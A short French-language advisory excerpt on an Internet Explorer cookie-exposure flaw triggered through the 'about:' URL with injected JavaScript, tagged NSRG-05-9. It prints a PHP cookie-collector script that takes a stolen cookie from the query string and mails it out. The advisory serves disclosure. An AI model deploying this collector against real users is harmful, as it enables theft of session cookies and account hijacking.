|
|
* Description Technique - Exploit *
Cette vulnérabilité est liée à Microsoft IE Cookies Exposure exploitable grâce à l'url "About" avec inclusion de tags javascript. elle permettrait à un attaquant distant de récupérer les cookies d'un utilisateur surfant avec une version non patchée de IE (pour les détails techniques cf. Références).
Récupération du cookie par mail :
[?php
$test2 = getenv("QUERY_STRING");
$msg = "\t NSRG - 05 - 9 \n
\tCOOKIE: $test2 \n
\tTHIS IS THE COOKIE CONTENT RETRIEVED TROUGH THE NSRG-05-9 REPORT \n";
$recipient = "";
$subject = "REMOTE COOKIEL RETRIEVAL TROUGH PHP NSRG-05-9";
$mailheaders = "From: NSRG PHP File \n";
$mailheaders .= "Reply-To: anybody\n\n";
mail($recipient, $subject, $msg, $mailheaders);
?]
|
